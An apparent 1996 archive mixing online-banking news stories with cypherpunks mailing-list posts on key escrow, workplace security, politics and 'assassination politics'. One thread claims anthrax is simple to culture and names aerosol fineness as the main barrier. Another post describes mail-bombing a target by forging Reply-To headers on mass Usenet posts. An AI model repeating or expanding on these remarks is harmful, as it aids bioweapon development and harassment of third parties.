Wednesday. "Making sure that banks use things as efficiently as possible is a win-win for everybody - the bank, its customers, and the community. "This is very symbolic of how the use of the electronic media can help banks of all sizes provide products and services to customers." Viveca Ware, director of payment systems at the Independent Bankers Association of America, said, "Not only does this open the door for banks to compete with nonbank Internet service providers, it opens up a whole new realm for banks to offer new services to their communities." Separately, the OCC approved a request by Huntington National Bank in Columbus, Ohio, to enter into a joint smart card venture with the Student Loan Marketing Association and Battelle Memorial Institute, a Columbus, Ohio-based technology research organization. Huntington has said the venture, to be based in Columbus and named Cybermark, will develop, market, and maintain stored-value card systems for self-contained communities such as universities, hospitals, theme parks, and military installations. Apollo already allows its customers to transfer funds, apply for loans, and view account balances via the Internet. Apollo purchased powerful computer equipment to provide these services and has the excess capacity to provide a gateway to the Internet. Ray Muth, the bank's executive vice president, said Apollo plans to entice new customers to its computer banking products by offering Internet access. "This is an absolutely golden opportunity for us," Mr. Muth said in an interview. "We'll increase our profitability by developing new customer relationships." The OCC concluded that offering Internet access to the public is part of the business of banking because it satisfies three criteria. First, it allows banks to provide more convenient service to customers. Second, the OCC argued that full Internet access is needed to let banks market their electronic banking services. Third, the OCC said that because the computer hardware Apollo purchased had extra capacity, the bank ought to be able to use it profitably. In the interview, however, Mr. Ludwig said banks cannot purchase computer equipment solely to offer customers Internet access. News Release(Online Resources): Wednesday, September 4, 1996 Online Resources to Provide Transaction Link to AOL Online Resources & Communication Corporation, one of the leading providers of interactive financial services, announced today that it has entered into an agreement with America Online Inc., the world's largest consumer online service, to provide financial transaction capabilities to America Online's more than six million members. This agreement coincides with the launch of the AOL Banking Center, a focal point that gives AOL members access to financial institutions who participate in the AOL Banking Center. AOL members may visit their financial institution's virtual branch that resides within the AOL Banking Center. Online Resources will have a direct link to AOL, enabling clients who participate in the AOL Banking Center to offer real-time banking, bill payment and other transaction services to AOL members. "The power of transaction processing cannot be understated," said Online Resources CEO Matthew P. Lawlor. "The AOL members will return to their virtual branch again and again if it is their site for moving money, paying bills and getting current personal financial information. The cross selling opportunities for participating financial institution are enormous." Ted Leonis, president of the AOL Service Company, said, "Online Resources is one of the leading interactive financial services providers in the industry. Its focus on financial institutions and their transaction capabilities nicely complement our focus on consumers and their desire for value-added services." Online Resources provides consumer access to its financial institution customers through the PC via its PC Windows-based software or the World Wide Web, and through its ScreenPhone and touch tone telephones. AOL members requesting transactions or personal financial information from their virtual branch will seamlessly link-up to their financial institution through Online's Web site and return to the virtual branch in the AOL Banking Center when they have finished. America Online Inc., (NASDAQ Symbol: AMER), based in Dulles, Virginia, is the largest consumer online service in the world, with more than 6.2 million members worldwide. Through its services, AOL offers its subscribers a wide variety of services including electronic mail, conferencing, software, computing support, interactive magazines and newspapers, and online classes, as well as easy and affordable access to services on the Internet. Founded in 1985, AOL today has a global work force consisting of more than 5,000 people. Personal computer owners can obtain America Online software at major retailers and bookstores or by calling 800/827-6364. McLean, Va.-based Online Resources & Communications Corp. is a privately held company founded in 1989. It specializes in providing home banking, bill paying, investment and other financial services to financial institutions for resale under their own brand to consumers and small businesses. Online's clients include banks, brokerages, credit unions, ATM networks and other financial service providers. Currently, Online has 40 institutional clients. Online provides financial institutions with extensive support services, such as consumer marketing, call center bill paying software or service, security and communications network management. Users of Online's services may access their financial institution through a variety of devices, including the PC, conventional telephones or the company's low-cost ScreenPhone. Easy, low-cost access to a variety of interactive financial services is supported through either private commercial networks or through the Internet. Online's Web site is www.orcc.com. News Release (Sanwa Bank): Wednesday, September 4, 1996 Sanwa Among First In U.S. to Offer AOL Subscribers Intuit Software Sanwa Bank California today became one of the first banks in the United States to offer online banking and bill payment to the more than 6 million subscribers of America Online (AOL) through a new computer program developed by the nation's leading maker of personal financial software. Developed by Intuit Inc., which also makes Quicken(R), the nation's most popular personal finance software, the new service has been dubbed BankNOW(TM) and is available to current Sanwa Bank customers who are subscribers to America Online, as well as to new customers who sign-up with America Online and Sanwa Bank. In conjunction with the introduction of BankNOW, Sanwa Bank has established a site on America Online to give current and prospective customers product and service information, as well as a point-and-click option for opening a new account. The BankNOW software can be downloaded from Sanwa's site on AOL free of charge. Sanwa helped pioneer PC banking a year ago when it teamed with both Intuit and Microsoft Corp. to offer customers a PC home banking option. At the same time, it launched its site on the World Wide Web(http://www.sanwabank.com), one of the first to offer consumers the option of applying for loans, credit cards and other services through the Internet. "BankNOW is online banking software created expressly for convenience- oriented PC users who want a fast, simple and hassle-free way to conduct online banking and payment transactions," said Kathleen Graham, vice president for retail banking at Sanwa. "It is a natural outgrowth of our already state-of-the-art electronic banking capability." Sanwa customers who sign-up to use BankNOW will have the following options available: -- Access to accounts day or night. -- Reconcilement of accounts automatically. -- Review of account balances. -- Online transfers between linked accounts. -- Write checks and pay bills to anyone or any creditor in the U.S. -- Send e-mail to communicate with Sanwa. As an additional inducement to sign-up, and in conjunction with its One Market Value account, Sanwa is offering a package of incentives, including fee-free ATM withdrawals at all STAR(R) and CIRRUS(R) locations, fee-free online banking and bill payment for 12 months, free checking for a year, no-annual-fee credit cards and no-annual-fee overdraft protection. On the business side, Sanwa's small business customers also will benefit if they sign-up for the BankNOW feature. Current and new customers, who have standard small business accounts, will receive 12 months of free online banking through BankNOW. Among other available options to small business customers are a direct e-mail link to the Sanwa branch manager assigned to their account and online banking at the special reduced rate of $7.95 for the first 12 months. This special reduced price includes eight online banking sessions and 20 bill payments per month. "We believe this alliance will bring user-friendly electronic banking to millions of consumers -- both personal and small business -- who might not otherwise have ever considered it," said Doug Stewart, first executive vice president. "It is another step toward reinforcing our campaign to remain one of the leaders in electronic banking throughout the U.S." American Banker: Thursday, September 5, 1996 On-Line Banking: Comerica Worker Moonlights in Cyberspace By JENNIFER KINGSON BLOOM By day, Frank De Armas is a foot soldier in Comerica Inc.'s information systems department. By night, he sheds his pinstripes, grabs his mouse, and becomes host and editor-in-chief of The Internet Banker, an on-line magazine, bulletin board, and resource center for people interested in what banks are doing in cyberspace. "It's like a clearing house for information on banking," Mr. De Armas said. "It started out as a little, tiny, part-time thing, but it just keeps growing." So much so that Mr. De Armas, a senior applications engineer for Detroit-based Comerica, now spends four hours a night at his home computer maintaining the Internet Banker site. He said it takes an hour to check all his links to other bank-related sites and to make sure that all the banks clamoring to be connected are added to the growing list. The other three hours are spent compiling a daily on-line banking newsletter, assembling a quarterly journal, and responding to questions that readers tack onto the site's bulletin boards. "If I know the answer, I post it," he said. The site grew out of Mr. De Armas' development last year of Comerica's Web site. He wanted to keep track of what other financial institutions were doing on the Internet, adding bank- and financial-related sites as he came across them. Then other people discovered his site and started using it. What began as a research tool "has taken on a life of its own." Bankers use the bulletin boards for global shop talk. In a recent posting, a Missouri banking regulator wrote to ask about the delivery of electronic banking services to rural areas. An Israeli economics student asked if people think the Internet will make "normal banks as we know them today disappear." A New Zealand banker named Lew solicited tips on boosting staff morale during a merger. A banker from Connecticut named Tom responded that "communication" and dress-down days had helped morale during his bank's merger. Then Mr. De Armas weighed in. "Tom has a good point," he wrote. "Anything you can do to make the employees feel more at ease will help. Stress is a natural byproduct of mergers." Trading insights has been the hobby's greatest pleasure for Mr. De Armas, an affable 35-year-old who taught himself to program computers in the Basic language while on injury leave from the Army. Mr. De Armas now knows several programming languages, and is an on-line veteran. "I was probably one of the only ones who used to get on chat lines on Prodigy at 1,200 baud," he recalled. His Web site radiates enthusiasm for the medium. In a page of tips about how to design a good site, he offers suggestions on how to link an electronic-mail address to a Web page, deftly suggesting: "The HTML code for this is easy." (HTML, or hypertext markup language, is the design language for Web sites.) For the less computer literate, Mr. De Armas' site offers a readable electronic magazine -- which he writes and edits -- on Internet-related banking issues. A recent issue included a question-and-answer session with one of the designers of BankAmerica Corp.'s Web site and a review of the site -- both presented in Mr. De Armas' effusive style. "You can't help but be impressed with BofA's site," he wrote in his review. "I tested the response time of the site at 9,600, 14,400, 28,800, and of course our leased line. ... My congratulations to the staff of BofA for a fine site." Stephen Hugley, senior vice president and manager of information services at Comerica, calls Mr. De Armas "one of our more literate client/server technicians. "He was instrumental in putting together our Web site, and he is also instrumental in helping other areas of the bank when they have Internet- type questions or issues," Mr. Hugley said. "It's a joy to work with somebody like Frank because he really has a good vision of where the Internet is going and what it's value will be." The Internet Banker site (www.ddsi.com/banking/), which now fields more than 20,000 hits a week, has won two awards and garnered several speaking invitations for its creator. Mr. De Armas' wife, Janice, runs a companion Web site called Metro Online, which contains information and listings about Detroit-area happenings. "You meet all kinds of people on the Web - it's amazing," Mr. De Armas said. "Just think of it as a big neighborhood." Among his electronic acquaintances is Tony Plath, director of the University of North Carolina's Center for Banking Studies. Mr. Plath's banking students use the Internet Banker site to collaborate on projects. "The real value in Frank's Web board is that a lot of bankers are point- and-click type Web users - they don't know how to post their own home page in HTML, and they don't have time for it," Mr. Plath said. "This allows you to post messages that people can read and to maintain threads of discussion." Bradley Streeter, a community reinvestment and development specialist with the Kansas City, Mo., outpost of the Office of the Comptroller of the Currency, views the Internet Banker site as a "wonderful research tool." "I was interested in how banks are using the electronic forum to reach low and moderate-income people," he said. "It helped inform me on what other people are thinking about the issue." Bill Burnham, a banking consultant at Booz-Allen & Hamilton, uses the site regularly. "I check it because they catalogue the top 100 banks on the Internet," he said. "I refer people to it as well." Most of the site's content is free, but Mr. De Armas does charge for his daily newsletter. Colleagues at Comerica receive complimentary subscriptions. And he has been attracting sponsors to his banking site. One advertiser, the principal of a Detroit-based brokerage firm, said the response has exceeded newspaper ads. "I was amazed," said the principal, Michael H. DeLap. "I thought I would put something out there in cyberspace and never hear anything about it again." Mr. De Armas is not the first person whose professional interests led him to develop his own cottage industry. Comic strip fans can look to Scott Adams, the creator of "Dilbert," as someone who created an unlikely career out of a straitlaced corporate job - at Pacific Bell. Mr. De Armas said he is content to stay in banking and enjoy the kudos on his Web site. "They love it here at Comerica," he said. "My management is really happy. It showed a little initiative." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 01:29:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 16:29:22 +0800 Subject: Diffie Hellman - logs in Galois fields In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk> Message-ID: <7y5euD2w165w@bwalk.dm.com> >From paul at fatmans.demon.co.uk Tue Sep 17 16:14:54 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Tue, 17 Sep 96 16:29:31 EDT for dlv Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA19740 for dlv at bwalk.dm.com; Tue, 17 Sep 96 16:14:54 -0400 Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ay20804; 17 Sep 96 20:55 BST Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23058; 17 Sep 96 20:33 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842988795 ; Tue, 17 Sep 96 19:33:15 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Tue, 17 Sep 1996 19:33:09 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Diffie Hellman - logs in Galois fields Cc: cypherpunks at toad.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <842988785.23058.0 at fatmans.demon.co.uk> > I think polluting this mailing list with trivial questions such as this is > just as bad as polluting it with personal attacks. Read the FAQs. Get a fucking life, seeing as you haven`t yet posted anything relating remotely to the technical aspects of cryptography to this list I think you need to take a long hard look at what your saying loser.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From shamrock at netcom.com Wed Sep 18 01:32:44 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 16:32:44 +0800 Subject: PGP in the workplace In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com> Message-ID: On Tue, 17 Sep 1996, Rick Osborne wrote: [clueless sysadmin story elided] > Now, seeing as I'm fairly new to the Corporate world, but is this something > common? I know when I was at college, poking around was expected and > encouraged, as it helped find and plug holes in the system. But this is > almost like some kind of protection racket here! This never happend in any company I worked for. Don't think I'd last in such an environment. Neither, one should think, will a company where half the people have root. Three man operations excepted. Just my $0.02, --Lucky From zachb at netcom.com Wed Sep 18 02:08:26 1996 From: zachb at netcom.com (Z.B.) Date: Wed, 18 Sep 1996 17:08:26 +0800 Subject: WARNING: Major Net-Abuse Message-ID: I don't know the full details about this, so I'll try to give as good an explanation as I can. Since sometime yesterday, someone has been posting huge binaries all over Usenet, usually to at least 20 groups at a time. The files are usually several thousand parts big at the least, and are posted to either groups in which people are likely to respond with emailbombs, or test groups that send you a reply if the message appears on them. What some $#&!@-heads are doing is changing the Reply-To headers to the addresses of people who they dislike or want to harass. See where I'm going now? 10000 posts to a test group with your address on it = 10000 emails in your inbox. I posted this because there are some people on both of these lists who might be the target of one of these spams, and you might want to get your killfiles ready, just in case. Thanks for your time, and sorry if I annoyed anyone with the off-topic post. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From ericm at lne.com Wed Sep 18 02:09:38 1996 From: ericm at lne.com (Eric Murray) Date: Wed, 18 Sep 1996 17:09:38 +0800 Subject: PGP in the workplace In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com> Message-ID: <199609180543.WAA25405@slack.lne.com> Rick Osborne writes: > > Here's one I figure you all would just love: [...] > Upon explaining to them that I was simply trying to make sure of my own > security, I was told that I was to just assume that I was secure, and that > *any* 'poking around' was found to be "highly aggravating" and could only > only "exascerbate the situation further." Quit and go work somewhere that's reasonable. A decent IS department doesn't play games like these; one that's full of morons does. Talented people, especially those who know security, are in demand at the moment. So you shouldn't have to put up with petty-tyrant bullshit- go find a company that is staffed by human beings. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From unicorn at schloss.li Wed Sep 18 02:14:28 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 17:14:28 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... In-Reply-To: <9608178430.AA843010044@smtplink.alis.ca> Message-ID: On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: > Black Unicorn wrote: > >On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: > >> Black Unicorn > >> >You are saying that everyone on the planet has a right to health > >> > insurance and disability insurance whether they can afford it or not. > >> > This is folly. The result is serious moral hazard problems. > >> > >> Almost, but not quite. I'm saying that within our two countries at least > >> (Canada, U.S.) everyone could have access to medically necessary > >> procedures because the *society as a whole* can afford it. > > > >The decisions about what is or is not medically necessary must by > >design be made by government in a socialized medicine regime. > > People do make decisions that affect other people. If you feel safer in the good > hands of Allstate than at the government trough, good for you. I feel safer in the hands of the market where Allstate is but one insurance carrier. > Personally, I trust in Allah, but I still tie up my camel. > > > This evades an important point as well. Namely, who cares if society > > can afford it? > > Some things are seen as investments in the future of a society. I view both > Education and Health through this lens. I'd like to hear the argument for Health. I'd like to hear the argument for Education- particularly one which makes socialized education systems the only, or even a good answer. > >> But there is a balance between accurately pricing the risk and > >> minimizing the cost of the bureacracy that polices this pricing. > > > > Oh, I see. Let's give the program to the government then. Good idea. > > That will reduce the cost of the bureacracy. > > The point is still valid. Are we not trying to minimize this cost? Now explain how government will reduce bureacracy and minimize cost please. Cite, if you will, a few examples. > >> There are also many ways to modify behaviour, not all of them direct. > > > > And all of them buy into the notion that people are not to be made > > personally responsible for their high risk behavior. > > There it is again. Blame the sick for their lack of moral fibre. Blame the rich for their condition. > Not every victim of lung cancer smokes. I'll tell you what. I will give you a dollar for every non-smoking related lung cancer case, if you give me one for every smoking related case. > Besides, people are notoriously poor at > evaluating the probability of unlikely events (see reference below). A > "punishment" that happens 30 years after the "crime" is no deterrent. > Prevention is usually cheaper than treatment. And now please describe how government and socialized medicine are better at preventing lung cancer. > > I prefer market solutions. > > I prefer solutions. Now please explain how government provides a superior solution. > James -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Wed Sep 18 02:23:30 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 17:23:30 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM> Message-ID: On Tue, 17 Sep 1996, Adamsc wrote: > On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: > > >>... former CIA director James Woolsey: responded with some seemingly > >> gratuitous anti-Net > >> rhetoric. Terrorists may use biological weapons like anthrax, he said. > >> "Anthrax is colorless, odorless, and has a 90 percent lethality. One > >> gram has 100 million lethal doses." Then Woolsey delivered the zinger: > >> "The knowledge of how to make anthrax is widely available, including > >> on the Internet." > > >Gee, biotech has come a long way. Now I can download the Anthrax DNA > >sequence from the net and insert it in some carrier bacteria and start > >making Anthrax bacteria. Neat! Culturing and growing anthrax is painfully simple. No DNA required. > >BTW - My dictionary says that Anthrax is primarily an animal disease which > >only occasionally infects humans. It sounds like a poor choice for bio-war > >terror. Incorrect. It is highly problematic and very nasty when it is properly delivered. The hardest thing about anthrax is to get an areosol fine enough to present an inhalation risk. (This is why it does not generally cause problems in humans- it's rare for it to get this fine). > Unfortunately, it can be very deadly. The idea here is that it rarely infects > humans - in the normal course of events. If a determined biowarrior is trying > to infect people, all bets are off. Exactly. > > # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp > # cadams at acucobol.com | V.M. (619)515-4894 -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From azur at netcom.com Wed Sep 18 03:06:06 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 18:06:06 +0800 Subject: The GAK Momentum is Building... Message-ID: >On Tue, 17 Sep 1996 21:02:03 -0700, Lucky Green wrote: >>On Tue, 17 Sep 1996, Timothy C. May wrote: >> However, making the government a _required_ part of such plans implies a >> motive that is not at all the same as what companies wish (mostly, disaster >> recovery). > >The required part will come later. Meanwhile, many big players in the >industry are volunteering to include GAK for you. It seems that in order for this to work Net consumers must be convinced/coerced into accepting the GAK security features. What if, due to a grassroots uprising, Neters refuse to use products which require GAK or Net services which will only operate via GAK? Isn't there an great opportunity being created for S/Wan, Apache and its ilk and third-party (especially off-shore, non-COCOM, produced) security plug-ins? > >When I asked the fellow from HP that proposed the CommerceNet position >paper how the "voluntary key recovery" he was proposing on his slides >could possibly aid law enforcement against criminals who obviously >wouldn't "escrow" their keys, he said, and I am not kidding: > >"There are many possible interpretations of the words voluntary and >mandatory." I was the *only* person in a room full of people working in the >industry that seemed bothered by this. > >> Furthermore, the main worry (for me, at least) is that the government hopes >> to get its Clipper IV scheme accepted (by means of export laws) at some >> large fraction of important corporate accounts, not the least of which will >> be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players >> in the "infrastructure" business. Once most of these have "bought off" on >> GAK, pressure will be intense to universalize the process, to make it a >> felony _not_ to use a "Key Authority." > >That's exactly how it will be. Enacting laws which make criminals out otherwise upstanding citizens is the surest path to civil disobedience/unrest, disrespect for duly constituted government and more serious criminal behavior. I guess I and many friends will be on posters in the Post Office. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From shamrock at netcom.com Wed Sep 18 03:33:01 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 18:33:01 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Steve Schear wrote: > It seems that in order for this to work Net consumers must be > convinced/coerced into accepting the GAK security features. What if, due > to a grassroots uprising, Neters refuse to use products which require GAK > or Net services which will only operate via GAK? Isn't there an great > opportunity being created for S/Wan, Apache and its ilk and third-party > (especially off-shore, non-COCOM, produced) security plug-ins? Simple. Incentivize sites/server/payment system manufacturers to require certs from their users. This is already underway. See SET. Then make sure that the certs/keys are GAK'ed. Yes, I know there is a difference between certs and keys. Joe User doesn't. Neither does the media. It is a two step process. > Enacting laws which make criminals out otherwise upstanding citizens is the > surest path to civil disobedience/unrest, disrespect for duly constituted > government and more serious criminal behavior. I guess I and many friends > will be on posters in the Post Office. Those of us that won't have "reformed", have been shot, or imprisoned, will indeed be on the posters in the Post Office. And the banners on all major websites. --Lucky From dthorn at gte.net Wed Sep 18 03:55:22 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 18 Sep 1996 18:55:22 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: Message-ID: <323F9328.7317@gte.net> My comment on the below: For an excellent overview of what the *really* big guys with the *really* big jobs (asst. sec. of state, undersec. of treasury, etc.) have in mind, try to get a video of something called the "World Economic Development Council" meeting, hosted by Nicholas Brady, Lawrence Summers et al, somewhere around Nov. 1992, and broadcast on C-Span. Despite the personal appearance of all the heavy hitters, the look of the program is akin to "Alphaville" or some such film. When you watch, you'll think you've entered the Twilight Zone, but the Alphaville look won't be the main reason for that. Allow me to paraphrase just one of the juicy offerings from Mr. Summers: "When we get this thing in place, if any of those blah blah blah countries gives us any shit, we'll jerk the rug out from under them in a heartbeat.", or, in the words of the infamous Joey the Hit Man, "We'll crush 'em like a bug". In any case, this video is the very best example I've seen of the opposing point of view to T.C. May's Crypto Anarchy. Chilling, in a word. > Thomas Dell wrote: > Needless to say, I despise the idea of a "wealth tax," and I can > see various loopholes and workarounds. I'd also expect a lot of > folks to simply move out of the country if this were to happen........ > The Expat Tax Is Law - The Door Is Now Closed! > by > Marc M. Harris > After last year's failed attempt to pass an American > expatriate tax, the U.S. Treasury Department succeeded in > sneaking the provisions into the miscellaneous revenue positions > of the recently passed Health Coverage Availability and > Affordability Act of 1996. Given the failure of their high > profile campaign last year, the Treasury Department switched > strategies this year and undertook one of stealth. While the > press was talking about tax-deductible contributions to medical > savings accounts (MSAs), provisions tightening the expatriation > tax rules were implemented. Foreign grantor trust rules were > also tightened under the law........ > "It has come to the attention of Congress that some > very wealthy individuals have been relinquishing their > citizenship to avoid U.S. income, estate and gift tax. The > bill does not want to discourage citizens from exercising > their right to expatriate, but does not want to provide a > tax incentive for such an action..."....... > If these provisions were making you feel a bit suicidal, > please forget it. Uncle Sam is not only going to pursue you to > the grave, but also your executors and heirs........ > About the Author > Marc M. Harris is a certified public accountant and > president of The Harris Organization. He has already developed a > strategy for legally avoiding the expat tax, which he discusses > only in personal appointments. > Copyright 1996 by Marc M. Harris From unicorn at schloss.li Wed Sep 18 04:12:40 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 19:12:40 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Steve Schear wrote: > >On Mon, 16 Sep 1996, Steve Schear wrote: > > > >> Someone wrote: > > > >> >The problem is that assasination rarely leads to the installation of > >> >a government that is any better. In most cases it gets worse. > > > >[...] > > > >> We've all heard these arguments, but are they true? Who says so, and how > >> can they be certain? Jim's suggestion has never, to my knowledge, been > >> tried on a consistant, large, scale. When all conventional alternatives > >> have been tried and fail, what have we or the starving children got to > >> lose? > > > >I think "Lord of the Flies" answers this question quite well. > > Does it? LOTF was fiction. Can you identify a recent instance in which a > non-governmental organization attempted to influence political/military > events via a concerted AP? Try every violent insurgent movement in the modern era. The only difference is the manner of target selection included no money. > >> Is it legal for citizens of the U.S. to engage in contract killing of > >> foreign military, politations, etc? How about U.S. or foreign non-profits? > > > >As to the first, yes. (There are several anti-mercenary statutes on the > >books) As to the second, I don't understand the question. > > > So, you're saying it is legal for citizens? Excuse me? No, I am saying that U.S. citizens will be breaking the law if they move to overthrow foreign governments, even in private action. This is called, among other names, an anti-mercenary statute. > The second question was whether a non-profit org. could raise > tax-deductible funds to conduct such operations. Done every day. As to the legality, it would clearly be criminal conspiracy to raise funds in furtherance of an attempt to violate anti-mercenary statutes. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From ecgwulf at worldnet.att.net Wed Sep 18 04:19:28 1996 From: ecgwulf at worldnet.att.net (Llywarch Hen) Date: Wed, 18 Sep 1996 19:19:28 +0800 Subject: Workers Paradise. /Political rant Message-ID: <2.2.16.19960918053037.26970514@postoffice.worldnet.att.net> "In July, Mr Lee [Kuan Yew, senior minister of Singapore] described an insight that came to him watching a sheepdog show in Australia. You start off with a group of young puppies, and 'weed out those who are not going to be successful . . . You either have those qualities or you don't.' It was, said Mr Lee, 'the simplest of all the lessons in life.' From _The Economist_, September 14th 1996. -- Llywarch Hen From dthorn at gte.net Wed Sep 18 04:27:52 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 18 Sep 1996 19:27:52 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: <323FAF89.651F@gte.net> Krenn wrote: > It would be nice to have a list of actual products which are deemed > potential snake-oil. Such a list could be maintained anonymously > through a nym to avoid all the annoying legal problems with commenting > on another's product. Though truth is the best defense against libel > charges, it would be very annoying to be sued or some such by some > hairbrained snake-oil peddler. Think how much more annoying it would be if the shoe were on the other foot. From tcmay at got.net Wed Sep 18 04:29:30 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 19:29:30 +0800 Subject: PGP in the workplace Message-ID: At 3:20 AM 9/18/96, Rick Osborne wrote: >Upon explaining to them that I was simply trying to make sure of my own >security, I was told that I was to just assume that I was secure, and that >*any* 'poking around' was found to be "highly aggravating" and could only >only "exascerbate the situation further." > >Luckily, I had to get to class, so I cut the conversation before it could >get any more out of control. > >Now, seeing as I'm fairly new to the Corporate world, but is this something >common? I know when I was at college, poking around was expected and >encouraged, as it helped find and plug holes in the system. But this is >almost like some kind of protection racket here! Sadly, this is common. Anybody taking undo interest in security "must have something to hide." Be aware that the effects can be a lot worse than just "being noticed," or even of being dismissed. Companies have been known to call in the police. (And since you are posting with a "Grumman" account, this could trigger visits by the DIA and other such agencies.) This happened in a well-publicized case up north, and I am convinced (from reading some of the details) that the programmer was not doing anything criminal. Even many who worked with him have expressed the same views, that he was just an unusually curious and attentive security expert. Some of them tell me they--and their employer!--were surprised the case actually went to trial. But the DA decided, for whatever reason, to prosecute on felony charges. I can only speculate about the pressures, the desire for publicity in a trendy new area ("computer crime"), and about the relative importance of this employer to the local economy. So, don't get too curious. Don't change your passwords more than your neighbors do (or at least not more than 2.13 standard deviations more often than is the statistical average of all employee-units within 7 cubicles of you in all directions). And whatever you do, never, never, never point out security flaws. This is a sure sign of your guilt. Or your smarty-pants attitude, which is actually worse. (Never cast perls before swine.) (All of this is explained daily in "Dilbert," of course.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From SpyKing at thecodex.com Wed Sep 18 04:30:20 1996 From: SpyKing at thecodex.com (SpyKing) Date: Wed, 18 Sep 1996 19:30:20 +0800 Subject: Codex Sample Message-ID: <9609180621.AA09327@plato.mne.com> Attached... This communication is copyrighted by the author. 1996, All Rights Reserved. Interception, forwarding, posting/re-posting of all /or any part of of this message is a violation of U.S. Copyright laws and may result in civil or criminal action against violators. The Codex Surveillance & Privacy Newsletter 